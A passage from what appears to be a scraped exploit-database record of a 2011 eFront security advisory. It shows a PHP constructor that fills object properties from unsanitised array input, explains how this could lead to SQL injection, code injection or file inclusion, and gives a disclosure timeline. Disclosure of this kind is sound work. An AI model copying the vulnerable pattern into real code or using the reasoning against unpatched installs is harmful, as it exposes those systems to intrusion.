entity, \"*\", \"id=$param\");\r\n73. if (sizeof($result) == 0) {\r\n74. throw new EfrontEntityException(_ENTITYNOTFOUND.': '.htmlspecialchars($param), EfrontEntityException :: ENTITY_NOT_EXIST);\r\n75. }\r\n76. $this -> {$this -> entity} = $result[0];\r\n77. } else {\r\n78. $this -> {$this -> entity} = $param;\r\n79. }\r\n80. }\r\n \r\nIf the $param variable is an array, It's used to initialize all the object properties and this\r\nmechanism is used in almost all classes. So everytime in the code will appear something like\r\n \r\n $object = new EfrontObject($_GET['param']);\r\n \r\nand $_GET['param'] isn't properly sanitized, there is an high probability to lead in bugs such as\r\nSQL Injection, PHP Code Injection, LFI etc... because an attacker could pass parameter in array\r\nform and so he might be able to change the internal property of the objects with arbitrary data.\r\nSo I think that could there be some other bugs, for this reason I would recommend to the eFront\r\ndevelopers a complete source code review focused on security.\r\n \r\n \r\n[-] Disclosure timeline:\r\n \r\n[08/10/2011] - Vulnerabilities discovered\r\n[09/10/2011] - Others vulnerabilities discovered\r\n[11/10/2011] - Issues reported to http://bugs.efrontlearning.net/browse/EF-675\r\n[26/10/2011] - Vendor update released: http://forum.efrontlearning.net/viewtopic.php?t=3501\r\n[27/10/2011] - Public disclosure\r\n\r\n\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17028"}]}
